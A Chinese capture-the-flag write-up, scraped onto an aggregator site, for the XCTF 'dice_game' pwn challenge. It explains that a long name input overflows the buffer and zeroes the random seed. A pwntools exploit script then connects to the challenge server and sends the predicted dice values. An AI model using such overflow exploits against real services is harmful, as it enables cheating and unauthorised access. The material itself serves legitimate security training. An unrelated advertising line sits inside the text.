[攻防世界 pwn]——dice_game

• 題目地址: https://adworld.xctf.org.cn/
• 題目:
  

思路

該題和前面的guess_num差不多, 可以點(diǎn)擊查看 請(qǐng)點(diǎn)擊。這道題是, 利用輸入的name將seed覆蓋,使得后面產(chǎn)生的隨機(jī)數(shù)不隨機(jī)。
注意在Linux上面運(yùn)行, window和Linux上面產(chǎn)生的隨機(jī)數(shù)不一樣

exploit

from pwn import * from LibcSearcher import * p=remote("111.200.241.244",37071) payload = 'a' * (0x50 - 0x10) + p64(0) p.sendlineafter("Welcome, let me know your name: ",payload) rand = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1] for i in range(50):p.sendlineafter("Give me the point(1~6): ", str(rand[i])) p.interactive() 與50位技術(shù)專家面對(duì)面20年技術(shù)見證，附贈(zèng)技術(shù)全景圖

總結(jié)

以上是生活随笔為你收集整理的[攻防世界 pwn]——dice_game的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。